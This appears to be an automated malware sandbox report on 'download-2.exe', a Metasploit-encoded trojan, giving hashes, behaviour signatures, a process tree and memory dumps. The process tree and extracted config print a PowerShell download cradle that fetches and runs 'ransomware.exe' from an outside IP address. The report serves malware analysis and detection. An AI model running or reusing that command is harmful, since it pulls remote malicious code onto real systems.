Overview

overview

10

Static

static

10

download-2.exe

windows7-x64

10

download-2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-06-2024 16:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    download-2.exe

  • Size

    4KB

  • MD5

    512c08286e3d66c21987e05f09ce7125

  • SHA1

    5a5970be0883565aeef9ab152713d6a41ac7daf6

  • SHA256

    716b65a42612f32fa410f3365eae3e348b9f046d5678e280f8e448d8c6e7b852

  • SHA512

    b20db24435d54afdbb4f89a307212622739ea9a63bd2c668214f0493e92d38edde0bf59aece36f89f7152a0039ba06169313a7cca0f671c645d00b8a50012cac

  • SSDEEP

    96:pxd6xaXg+9n+O0Kv5jhB5IJuG7XZgD6tYTB9X:LM0dp+BKvhhEuG7peDB1

Score
10/10
metasploitbackdoortrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.81.130.178:8080/ransomware.exe

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\download-2.exe
    "C:\Users\Admin\AppData\Local\Temp\download-2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3452
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "IEX(New-Object Net.webClient).downloadString('http://20.81.130.178:8080/ransomware.exe')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1020
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x4f8 0x300
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3624

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pldd3fhx.hdr.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1020-7-0x0000000073C80000-0x0000000074430000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1020-21-0x0000000006240000-0x0000000006594000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1020-8-0x0000000073C80000-0x0000000074430000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1020-28-0x0000000073C80000-0x0000000074430000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1020-6-0x0000000005970000-0x0000000005F98000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1020-9-0x0000000005860000-0x0000000005882000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1020-5-0x0000000005240000-0x0000000005276000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1020-4-0x0000000073C8E000-0x0000000073C8F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1020-11-0x00000000060D0000-0x0000000006136000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1020-10-0x0000000005900000-0x0000000005966000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1020-22-0x00000000066D0000-0x00000000066EE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1020-23-0x0000000006710000-0x000000000675C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1020-25-0x0000000006BD0000-0x0000000006BEA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1020-24-0x0000000007F60000-0x00000000085DA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3452-0-0x0000000000400000-0x0000000000404000-memory.dmp

    Filesize

    16KB

    Download